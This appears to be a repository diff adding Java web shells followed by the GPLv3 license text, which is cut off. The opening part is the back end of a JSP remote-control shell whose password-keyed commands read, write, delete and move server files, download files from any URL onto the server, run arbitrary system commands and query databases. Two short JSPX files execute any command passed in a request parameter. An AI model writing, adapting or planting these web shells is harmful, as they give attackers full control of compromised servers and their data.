+			File z[] = sf.listFiles();
+			for (int j = 0; j < z.length; j++) {
+				HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());
+			}
+		} else {
+			FileInputStream is = new FileInputStream(sf);
+			FileOutputStream os = new FileOutputStream(df);
+			int n;
+			byte[] b = new byte[512];
+			while ((n = is.read(b, 0, 512)) != -1) {
+				os.write(b, 0, n);
+			}
+			is.close();
+			os.close();
+		}
+	}
+	void II(String s, String d) throws Exception {
+		File sf = new File(s), df = new File(d);
+		sf.renameTo(df);
+	}
+	void JJ(String s) throws Exception {
+		File f = new File(s);
+		f.mkdir();
+	}
+	void KK(String s, String t) throws Exception {
+		File f = new File(s);
+		SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
+		java.util.Date dt = fm.parse(t);
+		f.setLastModified(dt.getTime());
+	}
+	void LL(String s, String d) throws Exception {
+		URL u = new URL(s);
+		int n = 0;
+		FileOutputStream os = new FileOutputStream(d);
+		HttpURLConnection h = (HttpURLConnection) u.openConnection();
+		InputStream is = h.getInputStream();
+		byte[] b = new byte[512];
+		while ((n = is.read(b)) != -1) {
+			os.write(b, 0, n);
+		}
+		os.close();
+		is.close();
+		h.disconnect();
+	}
+	void MM(InputStream is, StringBuffer sb) throws Exception {
+		String l;
+		BufferedReader br = new BufferedReader(new InputStreamReader(is));
+		while ((l = br.readLine()) != null) {
+			sb.append(l + "\r\n");
+		}
+	}
+	void NN(String s, StringBuffer sb) throws Exception {
+		Connection c = GC(s);
+		ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs();
+		while (r.next()) {
+			sb.append(r.getString(1) + "\t");
+		}
+		r.close();
+		c.close();
+	}
+	void OO(String s, StringBuffer sb) throws Exception {
+		Connection c = GC(s);
+		String[] x = s.trim().split("\r\n");
+		ResultSet r = c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null, "%", new String[]{"TABLE"});
+		while (r.next()) {
+			sb.append(r.getString("TABLE_NAME") + "\t");
+		}
+		r.close();
+		c.close();
+	}
+	void PP(String s, StringBuffer sb) throws Exception {
+		String[] x = s.trim().split("\r\n");
+		Connection c = GC(s);
+		Statement m = c.createStatement(1005, 1007);
+		ResultSet r = m.executeQuery("select * from " + x[x.length-1]);
+		ResultSetMetaData d = r.getMetaData();
+		for (int i = 1; i <= d.getColumnCount(); i++) {
+			sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)+ ")\t");
+		}
+		r.close();
+		m.close();
+		c.close();
+	}
+	void QQ(String cs, String s, String q, StringBuffer sb,String p) throws Exception {
+		Connection c = GC(s);
+		Statement m = c.createStatement(1005, 1008);
+		BufferedWriter bw = null;
+		try {
+			ResultSet r = m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q);
+			ResultSetMetaData d = r.getMetaData();
+			int n = d.getColumnCount();
+			for (int i = 1; i <= n; i++) {
+				sb.append(d.getColumnName(i) + "\t|\t");
+			}
+			sb.append("\r\n");
+			if(q.indexOf("--f:")!=-1){
+				File file = new File(p);
+				if(q.indexOf("-to:")==-1){
+					file.mkdir();
+				}
+				bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:") + 4,q.length()).trim()),true),cs));
+			}
+			while (r.next()) {
+				for (int i = 1; i <= n; i++) {
+					if(q.indexOf("--f:")!=-1){
+						bw.write(r.getObject(i)+""+"\t");
+						bw.flush();
+					}else{
+						sb.append(r.getObject(i)+"" + "\t|\t");
+					}
+				}
+				if(bw!=null){bw.newLine();}
+				sb.append("\r\n");
+			}
+			r.close();
+			if(bw!=null){bw.close();}
+		} catch (Exception e) {
+			sb.append("Result\t|\t\r\n");
+			try {
+				m.executeUpdate(q);
+				sb.append("Execute Successfully!\t|\t\r\n");
+			} catch (Exception ee) {
+				sb.append(ee.toString() + "\t|\t\r\n");
+			}
+		}
+		m.close();
+		c.close();
+	}
+%>
+<%
+	cs = request.getParameter("z0") != null ? request.getParameter("z0")+ "":cs;
+	response.setContentType("text/html");
+	response.setCharacterEncoding(cs);
+	StringBuffer sb = new StringBuffer("");
+	try {
+		String Z = EC(request.getParameter(Pwd) + "");
+		String z1 = EC(request.getParameter("z1") + "");
+		String z2 = EC(request.getParameter("z2") + "");
+		sb.append("->" + "|");
+		String s = request.getSession().getServletContext().getRealPath("/");
+		if (Z.equals("A")) {
+			sb.append(s + "\t");
+			if (!s.substring(0, 1).equals("/")) {
+				AA(sb);
+			}
+		} else if (Z.equals("B")) {
+			BB(z1, sb);
+		} else if (Z.equals("C")) {
+			String l = "";
+			BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
+			while ((l = br.readLine()) != null) {
+				sb.append(l + "\r\n");
+			}
+			br.close();
+		} else if (Z.equals("D")) {
+			BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
+			bw.write(z2);
+			bw.close();
+			sb.append("1");
+		} else if (Z.equals("E")) {
+			EE(z1);
+			sb.append("1");
+		} else if (Z.equals("F")) {
+			FF(z1, response);
+		} else if (Z.equals("G")) {
+			GG(z1, z2);
+			sb.append("1");
+		} else if (Z.equals("H")) {
+			HH(z1, z2);
+			sb.append("1");
+		} else if (Z.equals("I")) {
+			II(z1, z2);
+			sb.append("1");
+		} else if (Z.equals("J")) {
+			JJ(z1);
+			sb.append("1");
+		} else if (Z.equals("K")) {
+			KK(z1, z2);
+			sb.append("1");
+		} else if (Z.equals("L")) {
+			LL(z1, z2);
+			sb.append("1");
+		} else if (Z.equals("M")) {
+			String[] c = { z1.substring(2), z1.substring(0, 2), z2 };
+			Process p = Runtime.getRuntime().exec(c);
+			MM(p.getInputStream(), sb);
+			MM(p.getErrorStream(), sb);
+		} else if (Z.equals("N")) {
+			NN(z1, sb);
+		} else if (Z.equals("O")) {
+			OO(z1, sb);
+		} else if (Z.equals("P")) {
+			PP(z1, sb);
+		} else if (Z.equals("Q")) {
+			QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\", "/")+"images/");
+		}
+	} catch (Exception e) {
+		sb.append("ERROR" + ":// " + e.toString());
+	}
+	sb.append("|" + "<-");
+	out.print(sb.toString());
+%>

jspx/jjw.jspx

@@ -0,0 +1,6 @@
+<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"  version="1.2"> 
+<jsp:directive.page contentType="text/html" pageEncoding="UTF-8" /> 
+<jsp:scriptlet> 
+Runtime.getRuntime().exec(request.getParameter("i")); 
+</jsp:scriptlet> 
+</jsp:root>

jspx/jw.jspx

@@ -0,0 +1,15 @@
+<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"  version="1.2"> 
+<jsp:directive.page contentType="text/html" pageEncoding="UTF-8" /> 
+<jsp:scriptlet> 
+    if("sin".equals(request.getParameter("pwd"))){ 
+        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); 
+        int a = -1; 
+        byte[] b = new byte[2048]; 
+        out.print("&lt;pre&gt;"); 
+        while((a=in.read(b))!=-1){ 
+            out.println(new String(b)); 
+        } 
+        out.print("&lt;/pre&gt;"); 
+    } 
+</jsp:scriptlet> 
+</jsp:root>

license

@@ -0,0 +1,674 @@
+                    GNU GENERAL PUBLIC LICENSE
+                       Version 3, 29 June 2007
+
+ Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+                            Preamble
+
+  The GNU General Public License is a free, copyleft license for
+software and other kinds of works.
+
+  The licenses for most software and other practical works are designed
+to take away your freedom to share and change the works.  By contrast,
+the GNU General Public License is intended to guarantee your freedom to
+share and change all versions of a program--to make sure it remains free
+software for all its users.  We, the Free Software Foundation, use the
+GNU General Public License for most of our software; it applies also to
+any other work released this way by its authors.  You can apply it to
+your programs, too.
+
+  When we speak of free software, we are referring to freedom, not
+price.  Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+them if you wish), that you receive source code or can get it if you
+want it, that you can change the software or use pieces of it in new
+free programs, and that you know you can do these things.
+
+  To protect your rights, we need to prevent others from denying you
+these rights or asking you to surrender the rights.  Therefore, you have
+certain responsibilities if you distribute copies of the software, or if
+you modify it: responsibilities to respect the freedom of others.
+
+  For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must pass on to the recipients the same
+freedoms that you received.  You must make sure that they, too, receive
+or can get the source code.  And you must show them these terms so they
+know their rights.
+
+  Developers that use the GNU GPL protect your rights with two steps:
+(1) assert copyright on the software, and (2) offer you this License
+giving you legal permission to copy, distribute and/or modify it.
+
+  For the developers' and authors' protection, the GPL clearly explains
+that there is no warranty for this free software.  For both users' and
+authors' sake, the GPL requires that modified versions be marked as
+changed, so that their problems will not be attributed erroneously to
+authors of previous versions.
+
+  Some devices are designed to deny users access to install or run
+modified versions of the software inside them, although the manufacturer
+can do so.  This is fundamentally incompatible with the aim of
+protecting users' freedom to change the software.  The systematic
+pattern of such abuse occurs in the area of products for individuals to
+use, which is precisely where it is most unacceptable.  Therefore, we
+have designed this version of the GPL to prohibit the practice for those
+products.  If such problems arise substantially in other domains, we
+stand ready to extend this provision to those domains in future versions
+of the GPL, as needed to protect the freedom of users.
+
+  Finally, every program is threatened constantly by software patents.
+States should not allow patents to restrict development and use of
+software on general-purpose computers, but in those that do, we wish to
+avoid the special danger that patents applied to a free program could
+make it effectively proprietary.  To prevent this, the GPL assures that
+patents cannot be used to render the program non-free.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.
+
+                       TERMS AND CONDITIONS
+
+  0. Definitions.
+
+  "This License" refers to version 3 of the GNU General Public License.
+
+  "Copyright" also means copyright-like laws that apply to other kinds of
+works, such as semiconductor masks.
+
+  "The Program" refers to any copyrightable work licensed under this
+License.  Each licensee is addressed as "you".  "Licensees" and
+"recipients" may be individuals or organizations.
+
+  To "modify" a work means to copy from or adapt all or part of the work
+in a fashion requiring copyright permission, other than the making of an
+exact copy.  The resulting work is called a "modified version" of the
+earlier work or a work "based on" the earlier work.
+
+  A "covered work" means either the unmodified Program or a work based
+on the Program.
+
+  To "propagate" a work means to do anything with it that, without
+permission, would make you directly or secondarily liable for
+infringement under applicable copyright law, except executing it on a
+computer or modifying a private copy.  Propagation includes copying,
+distribution (with or without modification), making available to the
+public, and in some countries other activities as well.
+
+  To "convey" a work means any kind of propagation that enables other
+parties to make or receive copies.  Mere interaction with a user through
+a computer network, with no transfer of a copy, is not conveying.
+
+  An interactive user interface displays "Appropriate Legal Notices"
+to the extent that it includes a convenient and prominently visible
+feature that (1) displays an appropriate copyright notice, and (2)
+tells the user that there is no warranty for the work (except to the
+extent that warranties are provided), that licensees may convey the
+work under this License, and how to view a copy of this License.  If
+the interface presents a list of user commands or options, such as a
+menu, a prominent item in the list meets this criterion.
+
+  1. Source Code.
+
+  The "source code" for a work means the preferred form of the work
+for making modifications to it.  "Object code" means any non-source
+form of a work.
+
+  A "Standard Interface" means an interface that either is an official
+standard defined by a recognized standards body, or, in the case of
+interfaces specified for a particular programming language, one that
+is widely used among developers working in that language.
+
+  The "System Libraries" of an executable work include anything, other
+than the work as a whole, that (a) is included in the normal form of
+packaging a Major Component, but which is not part of that Major
+Component, and (b) serves only to enable use of the work with that
+Major Component, or to implement a Standard Interface for which an
+implementation is available to the public in source code form.  A
+"Major Component", in this context, means a major essential component
+(kernel, window system, and so on) of the specific operating system
+(if any) on which the executable work runs, or a compiler used to
+produce the work, or an object code interpreter used to run it.
+
+  The "Corresponding Source" for a work in object code form means all
+the source code needed to generate, install, and (for an executable
+work) run the object code and to modify the work, including scripts to
+control those activities.  However, it does not include the work's
+System Libraries, or general-purpose tools or generally available free
+programs which are used unmodified in performing those activities but
+which are not part of the work.  For example, Corresponding Source
+includes interface definition files associated with source files for
+the work, and the source code for shared libraries and dynamically
+linked subprograms that the work is specifically designed to require,
+such as by intimate data communication or control flow between those
+subprograms and other parts of the work.
+
+  The Corresponding Source need not include anything that users
+can regenerate automatically from other parts of the Corresponding
+Source.
+
+  The Corresponding Source for a work in source code form is that
+same work.
+
+  2. Basic Permissions.
+
+  All rights granted under this License are granted for the term of
+copyright on the Program, and are irrevocable provided the stated
+conditions are met.  This License explicitly affirms your unlimited
+permission to run the unmodified Program.  The output from running a
+covered work is covered by this License only if the output, given its
+content, constitutes a covered work.  This License acknowledges your
+rights of fair use or other equivalent, as provided by copyright law.
+
+  You may make, run and propagate covered works that you do not
+convey, without conditions so long as your license otherwise remains
+in force.  You may convey covered works to others for the sole purpose
+of having them make modifications exclusively for you, or provide you
+with facilities for running those works, provided that you comply with
+the terms of this License in conveying all material for which you do
+not control copyright.  Those thus making or running the covered works
+for you must do so exclusively on your behalf, under your direction
+and control, on terms that prohibit them from making any copies of
+your copyrighted material outside their relationship with you.
+
+  Conveying under any other circumstances is permitted solely under
+the conditions stated below.  Sublicensing is not allowed; section 10
+makes it unnecessary.
+
+  3. Protecting Users' Legal Rights From Anti-Circumvention Law.
+
+  No covered work shall be deemed part of an effective technological
+measure under any applicable law fulfilling obligations under article
+11 of the WIPO copyright treaty adopted on 20 December 1996, or
+similar laws prohibiting or restricting circumvention of such
+measures.
+
+  When you convey a covered work, you waive any legal power to forbid
+circumvention of technological measures to the extent such circumvention
+is effected by exercising rights under this License with respect to
+the covered work, and you disclaim any intention to limit operation or
+modification of the work as a means of enforcing, against the work's
+users, your or third parties' legal rights to forbid circumvention of
+technological measures.
+
+  4. Conveying Verbatim Copies.
+
+  You may convey verbatim copies of the Program's source code as you
+receive it, in any medium, provided that you conspicuously and
+appropriately publish on each copy an appropriate copyright notice;
+keep intact all notices stating that this License and any
+non-permissive terms added in accord with section 7 apply to the code;
+keep intact all notices of the absence of any warranty; and give all
+recipients a copy of this License along with the Program.
+
+  You may charge any price or no price for each copy that you convey,
+and you may offer support or warranty protection for a fee.
+
+  5. Conveying Modified Source Versions.
+
+  You may convey a work based on the Program, or the modifications to
+produce it from the Program, in the form of source code under the
+terms of section 4, provided that you also meet all of these conditions:
+
+    a) The work must carry prominent notices stating that you modified
+    it, and giving a relevant date.
+
+    b) The work must carry prominent notices stating that it is
+    released under this License and any conditions added under section
+    7.  This requirement modifies the requirement in section 4 to
+    "keep intact all notices".
+
+    c) You must license the entire work, as a whole, under this
+    License to anyone who comes into possession of a copy.  This
+    License will therefore apply, along with any applicable section 7
+    additional terms, to the whole of the work, and all its parts,
+    regardless of how they are packaged.  This License gives no
+    permission to license the work in any other way, but it does not
+    invalidate such permission if you have separately received it.
+
+    d) If the work has interactive user interfaces, each must display
+    Appropriate Legal Notices; however, if the Program has interactive
+    interfaces that do not display Appropriate Legal Notices, your
+    work need not make them do so.
+
+  A compilation of a covered work with other separate and independent
+works, which are not by their nature extensions of the covered work,
+and which are not combined with it such as to form a larger program,
+in or on a volume of a storage or distribution medium, is called an
+"aggregate" if the compilation and its resulting copyright are not
+used to limit the access or legal rights of the compilation's users
+beyond what the individual works permit.  Inclusion of a covered work
+in an aggregate does not cause this License to apply to the other
+parts of the aggregate.
+
+  6. Conveying Non-Source Forms.
+
+  You may convey a covered work in object code form under the terms
+of sections 4 and 5, provided that you also convey the
+machine-readable Corresponding Source under the terms of this License,
+in one of these ways:
+
+    a) Convey the object code in, or embodied in, a physical product
+    (including a physical distribution medium), accompanied by the
+    Corresponding Source fixed on a durable physical medium
+    customarily used for software interchange.
+
+    b) Convey the object code in, or embodied in, a physical product
+    (including a physical distribution medium), accompanied by a
+    written offer, valid for at least three years and valid for as
+    long as you offer spare parts or customer support for that product
+    model, to give anyone who possesses the object code either (1) a
+    copy of the Corresponding Source for all the software in the
+    product that is covered by this License, on a durable physical
+    medium customarily used for software interchange, for a price no
+    more than your reasonable cost of physically performing this
+    conveying of source, or (2) access to copy the
+    Corresponding Source from a network server at no charge.
+
+    c) Convey individual copies of the object code with a copy of the
+    written offer to provide the Corresponding Source.  This
+    alternative is allowed only occasionally and noncommercially, and
+    only if you received the object code with such an offer, in accord
+    with subsection 6b.
+
+    d) Convey the object code by offering access from a designated
+    place (gratis or for a charge), and offer equivalent access to the
+    Corresponding Source in the same way through the same place at no
+    further charge.  You need not require recipients to copy the
+    Corresponding Source along with the object code.  If the place to
+    copy the object code is a network server, the Corresponding Source
+    may be on a different server (operated by you or a third party)
+    that supports equivalent copying facilities, provided you maintain
+    clear directions next to the object code saying where to find the
+    Corresponding Source.  Regardless of what server hosts the
+    Corresponding Source, you remain obligated to ensure that it is
+    available for as long as needed to satisfy these requirements.
+
+    e) Convey the object code using peer-to-peer transmission, provided
+    you inform other peers where the object code and Corresponding
+    Source of the work are being offered to the general public at no
+    charge under subsection 6d.
+
+  A separable portion of the object code, whose source code is excluded
+from the Corresponding Source as a System Library, need not be
+included in conveying the object code work.
+
+  A "User Product" is either (1) a "consumer product", which means any
+tangible personal property which is normally used for personal, family,
+or household purposes, or (2) anything designed or sold for incorporation
+into a dwelling.  In determining whether a product is a consumer product,
+doubtful cases shall be resolved in favor of coverage.  For a particular
+product received by a particular user, "normally used" refers to a
+typical or common use of that class of product, regardless of the status
+of the particular user or of the way in which the particular user
+actually uses, or expects or is expected to use, the product.  A product
+is a consumer product regardless of whether the product has substantial
+commercial, industrial or non-consumer uses, unless such uses represent
+the only significant mode of use of the product.
+
+  "Installation Information" for a User Product means any methods,
+procedures, authorization keys, or other information required to install
+and execute modified versions of a covered work in that User Product from
+a modified version of its Corresponding Source.  The information must
+suffice to ensure that the continued functioning of the modified object
+code is in no case prevented or interfered with solely because
+modification has been made.
+
+  If you convey an object code work under this section in, or with, or
+specifically for use in, a User Product, and the conveying occurs as
+part of a transaction in which the right of possession and use of the
+User Product is transferred to the recipient in perpetuity or for a
+fixed term (regardless of how the transaction is characterized), the
+Corresponding Source conveyed under this section must be accompanied
+by the Installation Information.  But this requirement does not apply
+if neither you nor any third party retains the ability to install
+modified object code on the User Product (for example, the work has
+been installed in ROM).
+
+  The requirement to provide Installation Information does not include a
+requirement to continue to provide support service, warranty, or updates
+for a work that has been modified or installed by the recipient, or for
+the User Product in which it has been modified or installed.  Access to a
+network may be denied when the modification itself materially and
+adversely affects the operation of the network or violates the rules and
+protocols for communication across the network.
+
+  Corresponding Source conveyed, and Installation Information provided,
+in accord with this section must be in a format that is publicly
+documented (and with an implementation available to the public in
+source code form), and must require no special password or key for
+unpacking, reading or copying.
+
+  7. Additional Terms.
+
+  "Additional permissions" are terms that supplement the terms of this
+License by making exceptions from one or more of its conditions.
+Additional permissions that are applicable to the entire Program shall
+be treated as though they were included in this License, to the extent
+that they are valid under applicable law.  If additional permissions
+apply only to part of the Program, that part may be used separately
+under those permissions, but the entire Program remains governed by
+this License without regard to the additional permissions.
+
+  When you convey a copy of a covered work, you may at your option
+remove any additional permissions from that copy, or from any part of
+it.  (Additional permissions may be written to require their own
+removal in certain cases when you modify the work.)  You may place
+additional permissions on material, added by you to a covered work,
+for which you have or can give appropriate copyright permission.
+
+  Notwithstanding any other provision of this License, for material you
+add to a covered work, you may (if authorized by the copyright holders of
+that material) supplement the terms of this License with terms:
+
+    a) Disclaiming warranty or limiting liability differently from the
+    terms of sections 15 and 16 of this License; or
+
+    b) Requiring preservation of specified reasonable legal notices or
+    author attributions in that material or in the Appropriate Legal
+    Notices displayed by works containing it; or
+
+    c) Prohibiting misrepresentation of the origin of that material, or
+    requiring that modified versions of such material be marked in
+    reasonable ways as different from the original version; or
+
+    d) Limiting the use for publicity purposes of names of licensors or
+    authors of the material; or
+
+    e) Declining to grant rights under trademark law for use of some
+    trade names, trademarks, or service marks; or
+
+    f) Requiring indemnification of licensors and authors of that
+    material by anyone who conveys the material (or modified versions of
+    it) with contractual assumptions of liability to the recipient, for
+    any liability that these contractual assumptions directly impose on
+    those licensors and authors.
+
+  All other non-permissive additional terms are considered "further
+restrictions" within the meaning of section 10.  If the Program as you
+received it, or any part of it, contains a notice stating that it is
+governed by this License along with a term that is a further
+restriction, you may remove that term.  If a license document contains
+a further restriction but permits relicensing or conveying under this
+License, you may add to a covered work material governed by the terms
+of that license document, provided that the further restriction does
+not survive such relicensing or conveying.
+
+  If you add terms to a covered work in accord with this section, you
+must place, in the relevant source files, a statement of the
+additional terms that apply to those files, or a notice indicating
+where to find the applicable terms.
+
+  Additional terms, permissive or non-permissive, may be stated in the
+form of a separately written license, or stated as exceptions;
+the above requirements apply either way.
+
+  8. Termination.
+
+  You may not propagate or modify a covered work except as expressly
+provided under this License.  Any attempt otherwise to propagate or
+modify it is void, and will automatically terminate your rights under
+this License (including any patent licenses granted under the third
+paragraph of section 11).
+
+  However, if you cease all violation of this License, then your
+license from a particular copyright holder is reinstated (a)
+provisionally, unless and until the copyright holder explicitly and
+finally terminates your license, and (b) permanently, if the copyright
+holder fails to notify you of the violation by some reasonable means
+prior to 60 days after the cessation.
+
+  Moreover, your license from a particular copyright holder is
+reinstated permanently if the copyright holder notifies you of the
+violation by some reasonable means, this is the first time you have
+received notice of violation of this License (for any work) from that
+copyright holder, and you cure the violation prior to 30 days after
+your receipt of the notice.
+
+  Termination of your rights under this section does not terminate the
+licenses of parties who have received copies or rights from you under
+this License.  If your rights have been terminated and not permanently
+reinstated, you do not qualify to receive new licenses for the same
+material under section 10.
+
+  9. Acceptance Not Required for Having Copies.
+
+  You are not required to accept this License in order to receive or
+run a copy of the Program.  Ancillary propagation of a covered work
+occurring solely as a consequence of using peer-to-peer transmission
+to receive a copy likewise does not require acceptance.  However,
+nothing other than this License grants you permission to propagate or
+modify any covered work.  These actions infringe copyright if you do
+not accept this License.  Therefore, by modifying or propagating a
+covered work, you indicate your acceptance of this License to do so.
+
+  10. Automatic Licensing of Downstream Recipients.
+
+  Each time you convey a covered work, the recipient automatically
+receives a license from the original licensors, to run, modify and
+propagate that work, subject to this License.  You are not responsible
+for enforcing compliance by third parties with this License.
+
+  An "entity transaction" is a transaction transferring control of an
+organization, or substantially all assets of one, or subdividing an
+organization, or merging organizations.  If propagation of a covered
+work results from an entity transaction, each party to that
+transaction who receives a copy of the work also receives whatever
+licenses to the work the party's predecessor in interest had or could
+give under the previous paragraph, plus a right to possession of the
+Corresponding Source of the work from the predecessor in interest, if
+the predecessor has it or can get it with reasonable efforts.
+
+  You may not impose any further restrictions on the exercise of the
+rights granted or affirmed under this License.  For example, you may
+not impose a license fee, royalty, or other charge for exercise of
+rights granted under this License, and you may not initiate litigation
+(including a cross-claim or counterclaim in a lawsuit) alleging that
+any patent claim is infringed by making, using, selling, offering for
+sale, or importing the Program or any portion of it.
+
+  11. Patents.
+
+  A "contributor" is a copyright holder who authorizes use under this
+License of the Program or a work on which the Program is based.  The
+work thus licensed is called the contributor's "contributor version".
+
+  A contributor's "essential patent claims" are all patent claims
+owned or controlled by the contributor, whether already acquired or
+hereafter acquired, that would be infringed by some manner, permitted
+by this License, of making, using, or selling its contributor version,
+but do not include claims that would be infringed only as a
+consequence of further modification of the contributor version.  For
+purposes of this definition, "control" includes the right to grant
+patent sublicenses in a manner consistent with the requirements of
+this License.
+
+  Each contributor grants you a non-exclusive, worldwide, royalty-free
+patent license under the contributor's essential patent claims, to
+make, use, sell, offer for sale, import and otherwise run, modify and
+propagate the contents of its contributor version.
+
+  In the following three paragraphs, a "patent license" is any express
+agreement or commitment, however denominated, not to enforce a patent
+(such as an express permission to practice a patent or covenant not to
+sue for patent infringement).  To "grant" such a patent license to a
+party means to make such an agreement or commitment not to enforce a
+patent against the party.
+
+  If you convey a covered work, knowingly relying on a patent license,
+and the Corresponding Source of the work is not available for anyone
+to copy, free of charge and under the terms of this License, through a
+publicly available network server or other readily accessible means,
+then you must either (1) cause the Corresponding Source to be so
+available, or (2) arrange to deprive yourself of the benefit of the
+patent license for this particular work, or (3) arrange, in a manner
+consistent with the requirements of this License, to extend the patent
+license to downstream recipients.  "Knowingly relying" means you have
+actual knowledge that, but for the patent license, your conveying the
+covered work in a country, or your recipient's use of the covered work
+in a country, would infringe one or more identifiable patents in that
+country that you have reason to believe are valid.
+
+  If, pursuant to or in connection with a single transaction or
+arrangement, you convey, or propagate by procuring conveyance of, a
+covered work, and grant a patent license to some of the parties
+receiving the covered work authorizing them to use, propagate, modify
+or convey a specific copy of the covered work, then the patent license
+you grant is automatically extended to all recipients of the covered
+work and works based on it.
+
+  A patent license is "discriminatory" if it does not include within
+the scope of its coverage, prohibits the exercise of, or is
+conditioned on the non-exercise of one or more of the rights that are
+specifically granted under this License.  You may not convey a covered
+work if you are a party to an arrangement with a third party that is
+in the business of distributing software, under which you make payment
+to the third party based on the extent of your activity of conveying
+the work, and under which the third party grants, to any of the
+parties who would receive the covered work from you, a discriminatory
+patent license (a) in connection with copies of the covered work
+conveyed by you (or copies made from those copies), or (b) primarily
+for and in connection with specific products or compilations that
+contain the covered work, unless you entered into that arrangement,
+or that patent license was granted, prior to 28 March 2007.
+
+  Nothing in this License shall be construed as excluding or limiting
+any implied license or other defenses to infringement that may
+otherwise be available to you under applicable patent law.
+
+  12. No Surrender of Others' Freedom.
+
+  If conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot convey a
+covered work so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you may
+not convey it at all.  For example, if you agree to terms that obligate you
+to collect a royalty for further conveying from those to whom you convey
+the Program, the only way you could satisfy both those terms and this
+License would be to refrain entirely from conveying the Program.
+
+  13. Use with the GNU Affero General Public License.
+
+  Notwithstanding any other provision of this License, you have
+permission to link or combine any covered work with a work licensed
+under version 3 of the GNU Affero General Public License into a single
+combined work, and to convey the resulting work.  The terms of this
+License will continue to apply to the part which is the covered work,
+but the special requirements of the GNU Affero General Public License,
+section 13, concerning interaction through a network will apply to the
+combination as such.
+
+  14. Revised Versions of this License.
+
+  The Free Software Foundation may publish revised and/or new versions of
+the GNU General Public License from time to time.  Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+  Each version is given a distinguishing version number.  If the
+Program specifies that a certain numbered version of the GNU General
+Public License "or any later version" applies to it, you have the
+option of following the terms and conditions either of that numbered
+version or of any later version published by the Free Software
+Foundation.  If the Program does not specify a version number of the
+GNU General Public License, you may choose any version ever published
+by the Free Software Foundation.
+
+  If the Program specifies that a proxy can decide which future
+versions of the GNU General Public License can be used, that proxy's
+public statement of acceptance of a version permanently authorizes you
+to choose that version for the Program.
+
+  Later license versions may give you additional or different
+permissions.  However, no additional obligations are imposed on any
+author or copyright holder as a result of your choosing to follow a
+later version.
+
+  15. Disclaimer of Warranty.
+
+  THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
+APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
+HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
+OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
+THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
+IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
+ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
+
+  16. Limitation of Liability.
+
+  IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
+THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
+GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
+USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
+DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
+PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
+EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
+SUCH DAMAGES.
+
+  17. Interpretation of Sections 15 and 16.
+
+  If the disclaimer of warranty and limitation of liability provided
+above cannot be given local legal effect according to their terms,
+reviewing courts shall apply local law that most closely approximates
+an absolute waiver of all civil liability in connection with the
+Program, unless a warranty or assumption of liability accompanies a
+copy of the Program in return for a fee.
+
+                     END OF TERMS AND CONDITIONS
+
+            How to Apply These Terms to Your New Programs
+
+  If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+  To do so, attach the following notices to the program.  It is safest
+to attach them to the start of each source file to most effectively
+state the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+    {one line to give the program's name and a brief idea of what it does.}
+    Copyright (C) {year}  {name of author}
+
+    This program is free software: you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation, either version 3 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+Also add information on how to contact you by electronic and paper mail.
+
+  If the program does terminal interaction, make it output a short
